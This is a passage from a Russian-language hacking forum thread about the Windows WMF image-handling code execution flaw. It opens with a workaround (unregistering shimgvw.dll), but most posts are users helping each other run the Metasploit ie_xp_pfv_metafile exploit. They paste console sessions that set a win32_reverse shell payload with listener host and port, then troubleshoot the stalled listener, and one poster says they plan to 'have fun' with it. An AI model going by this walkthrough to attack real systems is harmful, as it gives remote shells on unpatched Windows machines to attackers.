Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 След.
RSS
Выполнение произвольного кода в Microsoft Windows при обработке WMF фа
 
что такое msf и где его брать?
 
Программа: Microsoft Windows 2000, XP, 2003

Опасность: Критическая

Наличие эксплоита: Да

Решение: Способов устранения уязвимости не существует в настоящее время.


Новогодний сурприз-хлопушка. :D
 
пускай работает на здоровье, не надо стандартным виндовым просмотрщиком пользоваться :D , делов то
 
Цитата
regsvr32 -u %windir%\system32\shimgvw.dll
Ага, не работает нифига на первой попавшейся тачке(2003 server, запущено из FAR) - заявило что LoadLibrary failed.  
Сработало cd %windir%\system32 а потом regsvr32 -u %windir%\system32\shimgvw.dll

P.S.А так метод фикса  *  - если болит голова, юзайте гильотину, ибо нефиг :funny:
P.P.S. вота хацкерам и петарды привалили - ждите кучек зомбаков  :o
 
Цитата
KDFS пишет:
Ага, не работает нифига на первой попавшейся тачке(2003 server, запущено из FAR) - заявило что LoadLibrary failed.
Сработало cd %windir%\system32 а потом regsvr32 -u %windir%\system32\shimgvw.dll
Это у тебя переменные окружения некорректно определены...
а по поводу воркграунда - то совершенно согласен...
 
Цитата
Это у тебя переменные окружения некорректно определены...
Неа, определено нормально (cd %WINDIR%\SYSTEM32 ведь сработал) - видимо что-то парсится не так, может из-за того что влуплено в фаре было а может из-за того что regsvr32 такой... хз, разрегал в конце концов и фиг с ним.Просто констатировал факт несрабатывания - ну, может не все с regsvr32 на ты....

Что до методов фикса - я неоднократно говорил что хакеры имеют такое неприятное свойство как класть на расписание выпуска патчей микрософтом большой .... болт!Соответственно я не понимаю почему MS считает себя в праве релизить фиксы для критичных дыр по расписанию.По моему разумению на то чтобы исправить ОДНУ длл и проверить что ничего попутно не отвалилось надо этак дня 3 (а с ресурсами то M$ и того меньше поди).
 
:help: на чем написан exploit? :help:
 
скрипт работает.
реально опасный vuln
и ещё новый... развлекусь я в новый год...
 
Цитата
Гость пишет:
на чем написан exploit?
На кампутере! :funny:
И на пёрле!
 
msf ie_xp_pfv_metafile > set PAYLOADS win32_reverse
PAYLOADS -> win32_reverse
msf ie_xp_pfv_metafile > show options

Exploit Options
===============

 Exploit:    Name        Default    Description
 --------    --------    -------    ----------------------------
 optional    HTTPHOST    0.0.0.0    The local HTTP listener host
 required    HTTPPORT    8080       The local HTTP listener port

 Target: Automatic - Windows XP / Windows 2003

msf ie_xp_pfv_metafile > set HTTPHOST 10.20.12.6
HTTPHOST -> 10.20.12.6
msf ie_xp_pfv_metafile > set LHOST 10.20.12.6
LHOST -> 10.20.12.6
msf ie_xp_pfv_metafile > exploit
[*] This exploit requires a valid payload to be specified first.
msf ie_xp_pfv_metafile >

в чем вопрос?
 
Так...продвижение уже есть. Теперь чисто кодерский вопрос......А чё это за ошибка?

D:\Perl\bin>1.pl
Base class package "Msf::Exploit" is empty.
       (Perhaps you need to 'use' the module which defines that package first.)
at MyModuie.pm line 6
BEGIN failed--compilation aborted at MyModuie.pm line 6.
Compilation failed in require at D:\Perl\bin\1.pl line 3.
BEGIN failed--compilation aborted at D:\Perl\bin\1.pl line 3.

Файл 1.pl:

#!/usr/bin/perl

use MyModuie;

Помогите плз...
 
Пока существуют такие деревья, которые думают, что эксплойт написан на перле, а сама бага - это buffer overflow(кстати, также утверждает наш "многоуважаемый" ЗАРАЗА в своем секурити-блоге ;-)), мы без работы не останемся.

ps: люблю русский лес!
 
Всё я понял свою ошибку!
Нужно делать на MFS.
 
Цитата
nIx пишет:
Пацаны, а какой .wmf фаил нужно исполозовать? С обычными сплоит не работает. :о
тот, что тут опубликован, работает великолепно, переделывать ничего не надо даже.
В том то и фишка, что с необычными работает :)
 
у меня на
Waiting for connections to http://0.0.0.0:8080/anything.wmf
останавливается и дальше не идет..
 
у тебя скорее всего файервол режет соединение.
 
у меня графика была запрещена  :o тока вот что с этим всем дальше делать?
 
Пацаны,у меня та же фигня. На строке  Waiting for connections to http://0.0.0.0:8080/anything.wmf  зависает, открываю wmf фаилы, дальше нихрена не идет. Файрвалл отключил. Если кто знает,подскажите плс.  :o
 
set HTTPORT
set HTTPHOST
нужно установить и графику разрешить и все заработает  :funny:  8)
 
and set  LHOST
Страницы: Пред. 1 2 3 4 5 След.
Читают тему